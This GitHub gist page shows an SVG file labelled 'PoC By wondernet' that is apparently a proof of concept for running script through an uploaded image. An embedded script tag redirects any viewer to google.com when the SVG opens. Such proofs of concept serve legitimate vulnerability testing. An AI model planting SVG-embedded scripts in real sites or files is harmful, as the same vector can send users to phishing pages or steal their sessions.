Skip to content

Instantly share code, notes, and snippets.

@wondernet
Last active March 5, 2024 08:59
Show Gist options
  • Save wondernet/d83fcdc6a1302e35c440d46ce074bdc6 to your computer and use it in GitHub Desktop.
Save wondernet/d83fcdc6a1302e35c440d46ce074bdc6 to your computer and use it in GitHub Desktop.
test_svg_circle
Display the source blob
Display the rendered blob
Raw
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="300" height="50" xmlns="http://www.w3.org/2000/svg">
<text x="10" y="30" font-family="Arial" font-size="20" fill="black">
PoC By wondernet
</text>
<script type="text/javascript">
window.location.href="https://google.com";
</script>
</svg>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment